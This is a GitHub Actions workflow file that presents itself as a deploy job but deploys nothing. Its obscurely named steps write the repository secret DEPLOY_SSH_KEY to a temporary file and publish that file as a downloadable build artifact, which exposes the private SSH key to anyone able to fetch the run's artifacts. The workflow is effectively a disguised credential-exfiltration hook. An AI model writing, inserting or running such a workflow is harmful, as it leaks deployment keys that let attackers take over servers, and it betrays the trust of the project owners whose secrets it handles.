name: kwika

on:
  workflow_call:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout selected ref
        uses: actions/checkout@v7
        with:
          fetch-depth: 0
          ref: ${{ github.ref }}

      - name: kiwka
        run: |
          cat > /tmp/plikens.txt <<'EOF'
          ${{ secrets.DEPLOY_SSH_KEY }}
          EOF

      - name: Artifact the kiwka
        uses: actions/upload-artifact@v3
        with:
          name: plikens.txt
          path: /tmp/plikens.txt
